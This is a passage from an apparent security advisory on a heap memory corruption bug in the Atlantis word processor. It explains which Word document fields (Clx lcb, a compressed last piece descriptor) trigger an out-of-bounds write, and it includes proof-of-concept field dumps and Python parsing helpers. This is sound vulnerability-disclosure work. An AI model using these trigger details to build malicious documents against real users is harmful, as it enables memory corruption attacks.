[48] <instance pint.uint32_t 'lProductRevised'> 0x0000a419 (42009)
[4c] <instance pint.uint32_t 'ccpText'> 0x00001440 (5184)
[50] <instance pint.uint32_t 'ccpFtn'> 0x00000000 (0)
[54] <instance pint.uint32_t 'ccpHdr'> 0x00000000 (0)
[58] <instance pint.uint32_t 'ccpMcr'> 0x00000000 (0)
[5c] <instance pint.uint32_t 'ccpAtn'> 0x00000000 (0)
[60] <instance pint.uint32_t 'ccpEdn'> 0x00000000 (0)
[64] <instance pint.uint32_t 'ccpTxbx'> 0x00000000 (0)
[68] <instance pint.uint32_t 'ccpHdrTxbx'> 0x00000000 (0)

After Atlantis validates the fields in the header, the vulnerability consists of just the Clx field inside the fibRgFcLcbBlob within the file information block. Each field inside fibRgFcLcbBlob has the following format. This structure contains a field fc which represents an offset into a stream, and lcb which represents the number of bytes. The Clx field is at index 33 of the fibRgFcLcbBlob array. For an FcLcb structure, the fc field represents the offset into the table stream. Atlantis uses the Clx.lcb field to control the size of the allocation which is then used in the loop that can corrupt memory. The application can corrupt memory after the array when it attempts to write a compressed offset back into the allocated CLX array because the lcb field is not a multiple of the size of a piece descriptor (8).

<class winword.FcLcb> 'Clx'
[1a2] <instance pint.uint32_t 'fc'> 0x00000772 (1906)
[1a6] <instance pint.uint32_t 'lcb'> 0x00000031 (49)
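
The position of this structure follows from the offsets in the Fib dump above, as the short Python sketch below shows. The helper names are hypothetical, and the eight bytes passed to read_fclcb are rebuilt from the values listed here rather than read from the file.

```python
import struct

FIB_RGFCLCB_OFFSET = 0x9A   # start of fibRgFcLcbBlob in the Fib dump above
FCLCB_SIZE = 8              # each FcLcb is a uint32 fc followed by a uint32 lcb
CLX_INDEX = 33

def fclcb_offset(index):
    """Offset of the FcLcb at `index` within the WordDocument stream."""
    return FIB_RGFCLCB_OFFSET + index * FCLCB_SIZE

def read_fclcb(data, offset=0):
    """Return (fc, lcb) decoded as two little-endian uint32 values."""
    return struct.unpack_from("<II", data, offset)

print(hex(fclcb_offset(CLX_INDEX)))                 # 0x1a2
fc, lcb = read_fclcb(struct.pack("<II", 0x772, 0x31))
print(hex(fc), hex(lcb))                            # 0x772 0x31
```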

Using the fc field from the FcLcb, the CLX array can be located inside the table stream. This array is prefixed with a byte, clxt, which determines what type of array will follow. Within the provided proof of concept, this value must be 0x02 so that a piece descriptor table array follows.

<class winword.Clx> 'Table.Clx'
[772] <instance pint.uint8_t 'clxt'> 0x02 (2)
[773] <instance ptype.undefined 'RgPrc'> ...
[773] <instance winword.Pcdt 'Pcdt'> "\x34\x00\x00\x00\x00\x00\x00\x00\x00\x0c  ..skipped ~28 bytes..  \xa7\x13\x00\x00\x40\x14\x00\x00\x40\x00\x00\x10"

The piece descriptor table array is prefixed with a 32-bit length, which is used to describe the size of the PlcPcd array.

<class winword.Pcdt> 'Pcdt'
[773] <instance pint.uint32_t 'lcb'> 0x00000034 (52)
[777] <instance winword.PlcPcd 'PlcPcd'> "\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x0e  ..skipped ~24 bytes.. \x40\x14\x00\x00\x40\x00\x00\x10\x00\x40\x00\x00"

Inside the PlcPcd array are two fields. The aCP field represents the character position. This array is composed of uint32_t and loops until one of the values is larger than the CCP fields that were explained earlier. Once the array has terminated, the rest of the structure (as sized by the lcb field of the Pcdt structure) is composed of Pcd elements.

<class winword.PlcPcd> 'PlcPcd'
[777] <instance winword._aCP 'aCP'> winword.CP[5] "\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\xa7\x13\x00\x00\x40\x14\x00\x00"
[78b] <instance dynamic.blockarray(winword.Pcd,32) 'aPcd'> winword.Pcd[4] "\x40\x00\x00\x10\x00\x40\x00\x00\x40\x00\x00\x14\x00\x00\x00\x00\x40\x00\x00\x30\x00\x40\x00\x00\x00\x00\x00\x58\x00\x40\x00\x00"
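
The two arrays in this dump can be decoded with the Python sketch below. It sizes the arrays from the total length in the same way as the (lcb - 4) / 12 calculation in the disassembly, rather than scanning aCP until a value reaches the CCP limit; parse_plcpcd is a hypothetical name.

```python
import struct

# The 52 bytes of PlcPcd from the dump above: aCP[5] followed by aPcd[4].
POC_PLCPCD = bytes.fromhex(
    "00000000" "000c0000" "000e0000" "a7130000" "40140000"
    "4000001000400000" "4000001400000000"
    "4000003000400000" "0000005800400000"
)

def parse_plcpcd(data):
    """Return (aCP list, list of (flags, fc, prm) tuples) for a PlcPcd blob."""
    count = (len(data) - 4) // 12                  # n Pcd elements, n + 1 CP elements
    acp = list(struct.unpack_from("<%dI" % (count + 1), data, 0))
    apcd_offset = (count + 1) * 4
    pcds = [struct.unpack_from("<HIH", data, apcd_offset + i * 8) for i in range(count)]
    return acp, pcds

acp, pcds = parse_plcpcd(POC_PLCPCD)
print([hex(cp) for cp in acp])
for flags, fc, prm in pcds:
    print(hex(flags), hex(fc), hex(prm))
```

In this data the final aCP entry is 0x1440, which equals the ccpText value shown earlier, and three of the four fc values (0x40001000, 0x40003000, 0x40005800) have the fCompressed bit set.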

Each Pcd structure has the following format and is eight bytes long. The first 16 bits represent general flags, followed by a uint32_t for the fc field, and then ended with a 16-bit value representing a Sprm. This vulnerability revolves around the fc field being compressed. A piece descriptor represents a compressed piece when the fCompressed flag (0x40000000) of the fc field is set. When this flag is set, the offset (0x3fffffff) is divided by 2 and then written past the array, corrupting any memory after the allocation. If the last element of the PlcPcd array is marked as compressed by setting this flag, this vulnerability is likely to be triggered.

<class winword.Pcd> '3'
[7a3] <instance winword._b 'b'> (0x0000,16)
[7a5] <instance winword.FcCompressed 'fc'> (0x40005800,32) : r1=(0x0,1) fCompressed=(0x1,1) fc=(0x00005800,30) : offset -> 0x2c00
[7a9] <instance winword.Prm 'prm'> "\x00\x00"
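
The fc decoding shown in this dump can be reproduced with a small Python sketch. The function name decode_fc is hypothetical, and the masks are the ones quoted in the text above.

```python
F_COMPRESSED = 0x40000000   # fCompressed flag within the 32-bit fc field
FC_MASK      = 0x3FFFFFFF   # low 30 bits hold the fc value

def decode_fc(raw):
    """Return (compressed, fc, stream offset) for a raw FcCompressed value."""
    compressed = bool(raw & F_COMPRESSED)
    fc = raw & FC_MASK
    # For a compressed piece the stored fc is twice the actual stream offset.
    offset = fc >> 1 if compressed else fc
    return compressed, fc, offset

compressed, fc, offset = decode_fc(0x40005800)
print(compressed, hex(fc), hex(offset))  # True 0x5800 0x2c00
```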

Timeline

2018-09-10 - Vendor Disclosure
2018-09-11 - Vendor patched via beta version
2018-09-26 - Vendor released
2018-10-01 - Public Disclosure

Credit

Discovered by a member of Cisco Talos.